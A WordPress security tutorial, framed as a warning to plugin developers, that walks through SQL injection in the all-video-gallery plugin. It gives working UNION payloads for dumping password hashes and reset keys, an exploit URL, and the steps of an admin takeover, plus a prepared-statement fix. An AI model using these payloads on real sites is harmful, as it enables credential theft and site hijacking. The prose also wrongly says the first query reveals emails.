How to use SQL injection attacks on WordPress sites

First of all, my purpose is not to teach others how to attack someone else’s website or destroy others’ efforts. This is a guide for WordPress developers who are novice coders or do not know about the vulnerabilities that may exist in the plugins they are using, so that you can avoid coding errors.

Step 1 – Understand the vulnerability in the WordPress site

If your site has been hacked, or if you want to make sure that no one can steal its content, you must first review your plugins and their code. Somewhere, a developer may be building an SQL query by hand without being aware of how SQL injection is used to break into WordPress sites. If such a spot exists, an attacker can use a UNION query to read every row of the wp_users table. Here is a sample UNION query used to retrieve all WordPress users and see their email addresses.

1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

What the hacker is doing here is learning the administrator’s email address, and the UNION query is the tool used for it.

A few months ago, the all-video-gallery plugin had a vulnerability in its config.php caused by the following code.

"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=".$_pid

In this query, the plugin developers use the $_pid variable directly in the SQL string without any type conversion or escaping.

$_pid = $_GET['pid'];

So an attacker can pass this UNION query through the pid parameter in the URL.

http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid={union Query here}

With the UNION query appended through pid, the query becomes the following.

"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users"

The output of this file is an XML document, so the concatenated rows from wp_users are returned directly to the attacker.
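The coding error above is fixed by validating the id as an integer and letting $wpdb->prepare() build the query, so nothing from the request can be appended as SQL. This is an added example, not the plugin’s own code; it assumes it runs inside WordPress (so $wpdb, absint() and ABSPATH exist), and the function name avg_get_profile is hypothetical.

```php
<?php
// Added example (not the all-video-gallery plugin's own code).
// Assumes this runs inside WordPress, so $wpdb, absint() and ABSPATH exist.

// Standard WordPress idiom: refuse to run if the file is requested directly
// instead of being loaded through WordPress.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// Hypothetical helper name; returns the profile row, or null if the id is invalid.
function avg_get_profile( $raw_pid ) {
    global $wpdb;

    // absint() casts to a non-negative integer: a value like "1 union select ..."
    // collapses to its leading digits (1) and anything non-numeric becomes 0.
    $pid = absint( $raw_pid );
    if ( 0 === $pid ) {
        return null;
    }

    // The table prefix comes from WordPress configuration, not from the request.
    $table = $wpdb->prefix . 'allvideogallery_profiles';

    // %d is an integer placeholder: $wpdb->prepare() substitutes the value as an
    // int, so no SQL from the request can reach the query string.
    $sql = $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $pid );

    return $wpdb->get_row( $sql );
}

// Vulnerable original, for comparison only (do not use):
//   $_pid = $_GET['pid'];
//   "SELECT * FROM " . $wpdb->prefix . "allvideogallery_profiles WHERE id=" . $_pid

$profile = avg_get_profile( isset( $_GET['pid'] ) ? $_GET['pid'] : 0 );
```

With this in place, the UNION payload shown above is reduced to the integer 1 and the query only ever returns a single profile row.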

Step 2 – Reset the WordPress password and get the activation key

Now they will try to reset the password using the administrator’s email address. To do so, they go to the login page and click the “Lost your password?” link. At this point a new activation key is mailed to the administrator’s email address, and the hacker uses the following query to read that activation key straight from the database.

1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

Again, they pass this UNION query through the same pid parameter as in the previous step.

The output is again an XML file, as shown below.

Step 3 – Use the activation key and reset the password

This is the last step: the attacker actually resets your password and gains complete control over your WordPress website. In this step he uses the activation key to reset the password by following this link: http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}

So the attacker can log in to your WordPress website and take full control of it. Usually they then insert malicious code into your files or modify a plugin file to serve as a WordPress backdoor, so they can attack your site again later.